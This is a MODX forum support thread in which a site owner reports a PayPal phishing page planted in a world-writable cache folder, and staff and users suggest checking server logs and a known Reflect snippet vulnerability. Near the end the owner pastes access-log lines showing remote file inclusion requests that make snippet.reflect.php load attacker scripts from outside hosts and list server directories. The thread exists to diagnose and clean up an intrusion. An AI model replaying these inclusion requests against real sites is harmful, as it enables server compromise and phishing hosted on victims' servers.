We launched new forums in March 2019—join us there. In a hurry for help with your website? Get Help Now!
    • 30457
    • 4 Posts
    how to protect the 777 directorie. because it is a big securyty hole.
    the picture above descripts what i mean
    in cache directory a paypal phishing accoured


    http://i33.tinypic.com/35chit3.jpg
      • 22303 MODX Staff
      • 10,725 Posts
      Don’t run a CMS on a system that is not secured sufficiently from other users on the same box. Who are you allowing to write to that directory? What user on your server would do this to you? Do you not know everyone on the server? Does your server not have open_basedir restrictions in effect? Do you have another security hole you are not aware of (e.g. compromised FTP passwords)?
        • 25483
        • 741 Posts
        Are you aware of this security leak: http://modxcms.com/forums/index.php/topic,30875.0.html
        I got attacked with that leak and they placed some files on my site, maybe this is the same problem.

        Can you access a access.log? You can see if there where some hacking attempts in there.
          with regards,

          Ronald Lokers
          'Front-end developer' @ h2o Media

          • 30457
          • 4 Posts
          my server is a dedicated server an me and one of my friend use tihs tihs server. so nobody can do this.

          nobody knows my ftp password or server login.
          if anyone knows it my site would be corrupted.

          it is  just the directories which have 777 permissions like cache, import,export
          is there anyway to solve this problem



          also i dont have reflect snipped
            • 25663 MODX Staff
            • 12,272 Posts
            FTP passwords can be easily brute force cracked. How many characters is your FTP password? The same can be done for brute for SSH attempts. I would review your server logs for suspicious activity.

            SSH into your box with an account with sudo privelleges and issue the following command replacing the "secure" bit/location with the relevant information for your particular server. You’ll probably be very surprised by the activity:
            sudo cat /var/log/secure | grep sshd


            Similarly for FTP:
            sudo cat /var/log/secure | grep ftp


            And that doesn’t even count what’s going on in your apache install... Enjoy!
              Ryan Thrash, MODX Co-Founder
              Follow me on Twitter at @rthrash or catch my occasional unofficial thoughts at thrash.me
              • 7231
              • 4,205 Posts
              I have brute force detection on my server and get warnings several times a day. If you run a dedicated box then you are lucky since you can close it up much tighter than a shared host (or even a vps).
              also i dont have reflect snipped
              It is installed as part of the default add-on set so you may have it in your assets/snippets folder even if it is not installed inside of modx manager.
                [font=Verdana]Shane Sponagle | [wiki] Snippet Call Anatomy | MODx Developer Blog | [nettuts] Working With a Content Management Framework: MODx

                Something is happening here, but you don't know what it is.
                Do you, Mr. Jones? - [bob dylan]
                • 30457
                • 4 Posts
                sorry  i had reclect snipped and  ideleted it forım manager and server.
                i also made all the directory permissions rwx r-x r-x
                also changed my ftp password with a stronger one.


                old access.log is deleted so i couldn’t find anything before hacking. but i have found this in access.log after.


                217.148.95.133 - - [07/Dec/2008:06:59:06 +0200] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.pluriversia.es/images/response??? HTTP/1.1" 200 355 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"

                91.198.129.12 - - [07/Dec/2008:09:11:25 +0200] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tos-belarus.org/data/id.txt?? HTTP/1.1" 200 331 "-" "Avant Browser (http://www.avantbrowser.com)"

                91.198.129.12 - - [07/Dec/2008:09:11:27 +0200] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tos-belarus.org/data/respons.txt?? HTTP/1.1" 200 384 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"

                66.113.100.51 - - [07/Dec/2008:05:51:25 +0200] "GET //assets/cache/File/File/paypal/paypal/ HTTP/1.1" 404 24397 "-" "Mozilla/6.0 (compatible; MSIE 7.03; Windows ME) Opera 5.11 [en]"
                209.147.127.217 - - [07/Dec/2008:05:52:30 +0200] "GET //assets/cache/File/File/paypal/paypal/webscr.php?cmd=_login-run&dispatch=443ab9401bde4a17a0b4cba9bbb30e0d443ab9401bde4a17a0b4cba9bbb30e0d HTTP/1.1" 404 24397 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/106.2 (KHTML, like Gecko) Safari/100.1"
                209.147.127.217 - - [07/Dec/2008:05:52:37 +0200] "GET //assets/cache/File/File/paypal/paypal/webscr.php?cmd=_login-run&dispatch=443ab9401bde4a17a0b4cba9bbb30e0d443ab9401bde4a17a0b4cba9bbb30e0d HTTP/1.1" 404 24397 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/106.2 (KHTML, like Gecko) Safari/100.1"
                209.147.127.217 - - [07/Dec/2008:05:52:44 +0200] "GET //assets/cache/File/File/paypal/paypal/webscr.php?cmd=_login-run&dispatch=443ab9401bde4a17a0b4cba9bbb30e0d443ab9401bde4a17a0b4cba9bbb30e0d HTTP/1.1" 404 24397 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/106.2 (KHTML, like Gecko) Safari/100.1"


                118.98.171.118 - - [07/Dec/2008:10:09:54 +0200] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http%3A%2F%2Fwww.tos-belarus.org%2Fdata%2Fcyberz.txt%3F%3F&act=ls&d=%2Fvar%2Fwww%2Fvhosts%2F..............%2Fhttpdocs%2Fassets%2Fcache&sort=0a HTTP/1.1" 200 7013 "http://www................//assets/snippets/reflect/snippet.reflect.php?reflect_base=http%3A%2F%2Fwww.tos-belarus.org%2Fdata%2Fcyberz.txt%3F%3F&act=ls&d=%2Fvar%2Fwww%2Fvhosts%2F.............%2Fhttpdocs%2Fassets%2F&sort=0a" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"